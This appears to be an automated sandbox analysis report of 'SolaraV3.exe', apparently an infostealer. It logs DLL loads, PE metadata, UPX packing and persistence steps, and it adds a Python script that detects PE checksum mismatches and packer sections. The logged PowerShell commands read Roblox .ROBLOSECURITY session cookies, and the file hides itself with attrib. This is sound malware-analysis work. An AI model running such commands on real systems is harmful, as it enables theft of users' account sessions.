Source: C:\Windows\System32\svchost.exe Section loaded: samcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: samlib.dll
Source: C:\Windows\System32\svchost.exe Section loaded: es.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mpr.dll
Source: C:\Windows\System32\attrib.exe Section loaded: ulib.dll
Source: C:\Windows\System32\attrib.exe Section loaded: fsutilext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: edputil.dll
Source: C:\Windows\System32\tree.com Section loaded: ulib.dll
Source: C:\Windows\System32\tree.com Section loaded: fsutilext.dll
Source: C:\Windows\System32\netsh.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\netsh.exe Section loaded: ifmon.dll
Source: C:\Windows\System32\netsh.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mprapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rasmontr.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rasapi32.dll
Source: C:\Windows\System32\netsh.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mfc42u.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe Section loaded: authfwcfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\System32\netsh.exe Section loaded: firewallapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: fwbase.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dhcpcmonitor.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dot3cfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dot3api.dll
Source: C:\Windows\System32\netsh.exe Section loaded: onex.dll
Source: C:\Windows\System32\netsh.exe Section loaded: eappcfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\netsh.exe Section loaded: eappprxy.dll
Source: C:\Windows\System32\netsh.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\netsh.exe Section loaded: fwcfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: hnetmon.dll
Source: C:\Windows\System32\netsh.exe Section loaded: netshell.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nlaapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: netsetupapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: netiohlp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\netsh.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nettrace.dll
Source: C:\Windows\System32\netsh.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nshhttp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: httpapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nshipsec.dll
Source: C:\Windows\System32\netsh.exe Section loaded: userenv.dll
Source: C:\Windows\System32\netsh.exe Section loaded: activeds.dll
Source: C:\Windows\System32\netsh.exe Section loaded: polstore.dll
Source: C:\Windows\System32\netsh.exe Section loaded: winipsec.dll
Source: C:\Windows\System32\netsh.exe Section loaded: adsldpc.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nshwfp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: cabinet.dll
Source: C:\Windows\System32\netsh.exe Section loaded: p2pnetsh.dll
Source: C:\Windows\System32\netsh.exe Section loaded: p2p.dll
Source: C:\Windows\System32\netsh.exe Section loaded: profapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rpcnsh.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wcnnetsh.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wlanapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: whhelper.dll
Source: C:\Windows\System32\netsh.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wlancfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wshelper.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wevtapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wwancfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wwapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wcmapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rmclient.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mobilenetworking.dll
Source: C:\Windows\System32\netsh.exe Section loaded: peerdistsh.dll
Source: C:\Windows\System32\netsh.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\netsh.exe Section loaded: slc.dll
Source: C:\Windows\System32\netsh.exe Section loaded: sppc.dll
Source: C:\Windows\System32\netsh.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: ktmw32.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mprmsg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wldp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\mshta.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Users\user\Desktop\SolaraV3.exe File opened: C:\Users\user\Desktop\pyvenv.cfg
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: SolaraV3.exe Static PE information: Image base 0x140000000 > 0x60000000
Source: SolaraV3.exe Static file information: File size 6315120 > 1048576
Source: SolaraV3.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: SolaraV3.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: SolaraV3.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: SolaraV3.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: SolaraV3.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: SolaraV3.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: SolaraV3.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: SolaraV3.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: SolaraV3.exe, 00000002.00000002.2054170176.00007FFB1E4C1000.00000040.00000001.01000000.0000000D.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: SolaraV3.exe, 00000002.00000002.2046985205.00007FFB0B7FC000.00000040.00000001.01000000.00000013.sdmp
Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASMOpenSSL 1.1.1t 7 Feb 2023built on: Thu Feb 9 15:27:40 2023 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-1_1"not available source: SolaraV3.exe, 00000002.00000002.2047840849.00007FFB0BA60000.00000040.00000001.01000000.0000000F.sdmp
Source: Binary string: d:\a01\_work\12\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: SolaraV3.exe, 00000001.00000003.1559590237.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2053703446.00007FFB1C3C1000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.1.dr
Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: SolaraV3.exe, SolaraV3.exe, 00000002.00000002.2051655996.00007FFB0C5F1000.00000040.00000001.01000000.00000006.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: SolaraV3.exe, SolaraV3.exe, 00000002.00000002.2051929047.00007FFB18B71000.00000040.00000001.01000000.00000011.sdmp
Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_A source: SolaraV3.exe
Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbMM source: SolaraV3.exe, 00000002.00000002.2051343700.00007FFB0C5DB000.00000040.00000001.01000000.00000008.sdmp
Source: Binary string: D:\a\1\b\libssl-1_1.pdb@@ source: SolaraV3.exe, 00000002.00000002.2050155704.00007FFB0C3C6000.00000040.00000001.01000000.00000010.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\python310.pdb source: SolaraV3.exe, 00000002.00000002.2049056875.00007FFB0BECF000.00000040.00000001.01000000.00000004.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: SolaraV3.exe, SolaraV3.exe, 00000002.00000002.2053917460.00007FFB1E471000.00000040.00000001.01000000.00000012.sdmp
Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASM source: SolaraV3.exe, 00000002.00000002.2047840849.00007FFB0BA60000.00000040.00000001.01000000.0000000F.sdmp
Source: Binary string: ;C:\Users\user\AppData\Local\Temp\se3yji4z\se3yji4z.pdb source: powershell.exe, 0000004A.00000002.1847941368.00000239E7D72000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: ;C:\Users\user\AppData\Local\Temp\se3yji4z\se3yji4z.pdbhP@ source: powershell.exe, 0000004A.00000002.1847941368.00000239E7D72000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: SolaraV3.exe, 00000002.00000002.2051343700.00007FFB0C5DB000.00000040.00000001.01000000.00000008.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: SolaraV3.exe, SolaraV3.exe, 00000002.00000002.2053371221.00007FFB1C251000.00000040.00000001.01000000.00000009.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: SolaraV3.exe, 00000002.00000002.2050924426.00007FFB0C441000.00000040.00000001.01000000.0000000B.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: SolaraV3.exe, 00000002.00000002.2052555001.00007FFB1AB01000.00000040.00000001.01000000.0000000C.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: SolaraV3.exe, 00000002.00000002.2052925726.00007FFB1BB11000.00000040.00000001.01000000.0000000A.sdmp
Source: Binary string: D:\a\1\b\libcrypto-1_1.pdb source: SolaraV3.exe, SolaraV3.exe, 00000002.00000002.2047840849.00007FFB0BAE2000.00000040.00000001.01000000.0000000F.sdmp
Source: Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb source: rar.exe, 0000006E.00000000.1923151482.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmp, rar.exe, 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmp, rar.exe.1.dr
Source: Binary string: D:\a\1\b\libssl-1_1.pdb source: SolaraV3.exe, SolaraV3.exe, 00000002.00000002.2050155704.00007FFB0C3C6000.00000040.00000001.01000000.00000010.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: SolaraV3.exe, SolaraV3.exe, 00000002.00000002.2050619713.00007FFB0C411000.00000040.00000001.01000000.0000000E.sdmp
Source: SolaraV3.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: SolaraV3.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: SolaraV3.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: SolaraV3.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: SolaraV3.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

barindex
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\se3yji4z\se3yji4z.cmdline"
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0BB66EE0 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect, 2_2_00007FFB0BB66EE0
Source: python310.dll.1.dr Static PE information: real checksum: 0x0 should be: 0x179482
Source: unicodedata.pyd.1.dr Static PE information: real checksum: 0x0 should be: 0x4d519
Source: libffi-7.dll.1.dr Static PE information: real checksum: 0x0 should be: 0x9bb1
Source: _ctypes.pyd.1.dr Static PE information: real checksum: 0x0 should be: 0x15162
Source: _bz2.pyd.1.dr Static PE information: real checksum: 0x0 should be: 0x190ae
Source: sqlite3.dll.1.dr Static PE information: real checksum: 0x0 should be: 0xa7f83
Source: libcrypto-1_1.dll.1.dr Static PE information: real checksum: 0x0 should be: 0x118790
Source: libssl-1_1.dll.1.dr Static PE information: real checksum: 0x0 should be: 0x3bfea
Source: SolaraV3.exe Static PE information: real checksum: 0x60f6c0 should be: 0x6069ca
Source: _queue.pyd.1.dr Static PE information: real checksum: 0x0 should be: 0xd20c
Source: _socket.pyd.1.dr Static PE information: real checksum: 0x0 should be: 0x16097
Source: _ssl.pyd.1.dr Static PE information: real checksum: 0x0 should be: 0x15afd
Source: _hashlib.pyd.1.dr Static PE information: real checksum: 0x0 should be: 0x14a50
Source: se3yji4z.dll.93.dr Static PE information: real checksum: 0x0 should be: 0xce6c
Source: _decimal.pyd.1.dr Static PE information: real checksum: 0x0 should be: 0x241ea
Source: select.pyd.1.dr Static PE information: real checksum: 0x0 should be: 0x927e
Source: _lzma.pyd.1.dr Static PE information: real checksum: 0x0 should be: 0x2099b
Source: _sqlite3.pyd.1.dr Static PE information: real checksum: 0x0 should be: 0x1931c
Source: libffi-7.dll.1.dr Static PE information: section name: UPX2
Source: VCRUNTIME140.dll.1.dr Static PE information: section name: _RDATA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 14_2_00007FFAA935D2A5 pushad ; iretd 14_2_00007FFAA935D2A6
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
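
The checksum and section-name entries above are static indicators: a header CheckSum of 0 that disagrees with the value computed over the file, and UPX0/UPX1 section names left behind by the UPX packer. As an added example that is not part of the sandbox report, the Python below implements the PE checksum algorithm and the section-name check from the raw PE headers (no pefile dependency) and runs it over a constructed, headers-only PE32+ image built in memory; build_sample, PACKER_SECTIONS and the finding strings are assumptions of this example. Caveat: many legitimately built user-mode binaries ship with CheckSum 0 because the linker only fills it in for /RELEASE builds and Windows only validates it for kernel-mode drivers and certain system DLLs, so a mismatch on its own is weak evidence; it is the combination with packer section names (and, here, the same zero checksum on every dropped PyInstaller payload) that is worth acting on.

```python
import struct

OPT_HDR_CHECKSUM_OFF = 64          # CheckSum is at +64 in both PE32 and PE32+ optional headers
PACKER_SECTIONS = {"UPX0", "UPX1", "UPX2"}   # assumed list of section names that identify UPX


def pe_checksum(data: bytes, checksum_field_off: int) -> int:
    """Recompute IMAGE_OPTIONAL_HEADER.CheckSum the way CheckSumMappedFile does:
    sum every 32-bit word except the CheckSum field itself, fold carries into
    16 bits, then add the unpadded file length."""
    if checksum_field_off % 4:
        raise ValueError("CheckSum field is not dword-aligned")
    padded = data + b"\0" * (-len(data) % 4)
    total = 0
    for off in range(0, len(padded), 4):
        if off == checksum_field_off:
            continue
        total += struct.unpack_from("<I", padded, off)[0]
        if total >= 1 << 32:
            total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total += total >> 16
    total &= 0xFFFF
    return total + len(data)


def parse_pe(data: bytes) -> dict:
    """Pull the fields triage needs straight out of the DOS/COFF/optional headers."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    machine, nsect, _ts, _symptr, _nsym, opt_size, _chars = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic not in (0x10B, 0x20B):
        raise ValueError(f"unexpected optional header magic {magic:#x}")
    checksum_off = opt + OPT_HDR_CHECKSUM_OFF
    sect_table = opt + opt_size
    sections = []
    for i in range(nsect):
        raw = data[sect_table + i * 40: sect_table + i * 40 + 8]
        sections.append(raw.rstrip(b"\0").decode("ascii", "replace"))
    return {
        "machine": machine,
        "pe32plus": magic == 0x20B,
        "checksum_off": checksum_off,
        "header_checksum": struct.unpack_from("<I", data, checksum_off)[0],
        "sections": sections,
    }


def triage(data: bytes) -> list:
    """Return the static findings the report lists: checksum mismatch and packer sections."""
    info = parse_pe(data)
    findings = []
    computed = pe_checksum(data, info["checksum_off"])
    if info["header_checksum"] != computed:
        findings.append(f"checksum mismatch: header {info['header_checksum']:#x} should be {computed:#x}")
    for name in info["sections"]:
        if name in PACKER_SECTIONS:
            findings.append(f"packer section name: {name}")
    return findings


def build_sample(section_names, checksum=None) -> bytes:
    """Constructed, headers-only PE32+ image (no code) for offline testing.
    Pass checksum=0 to mimic the dropped files above; None stores the correct value."""
    buf = bytearray(0x200)
    buf[:2] = b"MZ"
    struct.pack_into("<I", buf, 0x3C, 0x80)                    # e_lfanew
    buf[0x80:0x84] = b"PE\0\0"
    coff = 0x84
    struct.pack_into("<HHIIIHH", buf, coff, 0x8664, len(section_names), 0, 0, 0, 240, 0x22)
    opt = coff + 20
    struct.pack_into("<H", buf, opt, 0x20B)                    # PE32+ magic
    sect_table = opt + 240
    for i, name in enumerate(section_names):
        buf[sect_table + i * 40: sect_table + i * 40 + 8] = name.encode().ljust(8, b"\0")
    if checksum is None:
        checksum = pe_checksum(bytes(buf), opt + OPT_HDR_CHECKSUM_OFF)
    struct.pack_into("<I", buf, opt + OPT_HDR_CHECKSUM_OFF, checksum)
    return bytes(buf)


if __name__ == "__main__":
    for label, img in (("packed", build_sample(["UPX0", "UPX1"], checksum=0)),
                       ("clean", build_sample([".text", ".rdata"]))):
        print(label, triage(img) or ["no findings"])
```

Point triage() at a real file (`triage(open(path, "rb").read())`) to reproduce the "real checksum ... should be" lines for the dropped DLLs and .pyd files; the UPX2 name seen on libffi-7.dll is covered by PACKER_SECTIONS as well.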

Persistence and Installation Behavior

barindex
Source: C:\Users\user\Desktop\SolaraV3.exe Process created: "C:\Users\user\Desktop\SolaraV3.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\Desktop\SolaraV3.exe"
Source: C:\Windows\System32\cmd.exe Process created: reg.exe
Source: C:\Windows\System32\cmd.exe Process created: reg.exe
Source: C:\Windows\System32\cmd.exe Process created: attrib.exe
Source: C:\Windows\System32\cmd.exe Process created: reg.exe
Source: C:\Windows\System32\cmd.exe Process created: attrib.exe
Source: C:\Windows\System32\cmd.exe Process created: attrib.exe
Source: C:\Users\user\Desktop\SolaraV3.exe Process created: attrib.exe
Source: C:\Users\user\Desktop\SolaraV3.exe Process created: reg.exe
Source: C:\Users\user\Desktop\SolaraV3.exe File created: C:\Users\user\AppData\Local\Temp\_MEI28842\libcrypto-1_1.dll
Source: C:\Users\user\Desktop\SolaraV3.exe File created: C:\Users\user\AppData\Local\Temp\_MEI28842\_queue.pyd
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\se3yji4z\se3yji4z.dll
Source: C:\Users\user\Desktop\SolaraV3.exe File created: C:\Users\user\AppData\Local\Temp\_MEI28842\_bz2.pyd
